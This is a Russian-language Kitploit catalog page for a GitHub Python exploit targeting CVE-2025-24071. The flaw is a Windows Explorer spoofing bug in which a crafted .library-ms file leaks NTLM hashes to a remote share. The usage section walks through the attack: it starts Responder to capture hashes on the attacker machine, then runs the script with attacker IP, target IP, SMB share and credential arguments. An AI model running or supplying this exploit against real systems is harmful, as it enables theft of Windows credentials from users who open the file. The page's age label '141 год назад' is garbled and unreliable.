Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24071 — Python-скрипт для выполнения CVE-2025-24071 | Kitploit
Инструменты/GitHubGitHub/ac8999/cve-2025-24071
Взлом паролейАнализ уязвимостейЭксплуатацияСбор информацииТестирование на ПроникновениеRed Teaming
GitHubac8999/cve-2025-24071

CVE-2025-24071

Python-скрипт для выполнения CVE-2025-24071

Репозиторий
141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24071: Уязвимость спуфинга в проводнике Windows (скрипт от SilentExploit)

📖 Описание

Данный проект обнаруживает и демонстрирует эксплуатацию уязвимости спуфинга в проводнике Windows.

Проблема возникает из-за библиотечного файла Windows (.library-ms), содержащего сетевой путь, либо в виде прямого вложения, либо встроенного в архив.
При открытии файл может заставить Windows утечь NTLM-хэши на удалённый (потенциально вредоносный) сетевой ресурс.

POC: https://imgur.com/a/hEO83Se

⚡ Использование

1. Запуск Responder

На атакующей машине запустите Responder для перехвата NTLM-хэшей:

root@kitploit:~
sudo responder -I tun0 -wvF
  1. Запуск скрипта

Вы можете настроить скрипт двумя способами:

✅ Вариант A: Редактирование значений по умолчанию (проще всего)

Измените параметры по умолчанию непосредственно в скрипте.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ Вариант B: Запуск с параметрами командной строки

Выполните с аргументами:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
Скачать инструмент